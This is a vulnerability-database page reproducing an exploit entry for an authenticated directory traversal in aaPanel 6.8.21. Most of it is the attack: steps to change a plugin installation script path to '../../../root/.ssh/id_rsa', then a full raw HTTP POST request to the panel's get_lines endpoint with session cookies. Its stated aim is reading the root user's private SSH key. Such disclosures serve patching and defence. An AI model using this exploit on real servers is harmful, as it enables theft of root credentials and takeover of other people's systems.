Wednesday, March 23, 2022

aaPanel 6.8.21 - Directory Traversal (Authenticated)

# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
# Date: 22.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage:
# Software Link:
# Version: 6.8.21
# Tested on: Ubuntu

Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)

#Go to App Store

#Click to "install" in any free plugin.

#Change installation script to ../../../root/.ssh/id_rsa

POST /ajax?action=get_lines HTTP/1.1
Host: IP:7800
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:7800
Referer: http://IP:7800/soft
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
load_type=null; load_search=undefined; force=0; rank=list;
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
Connection: close


Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore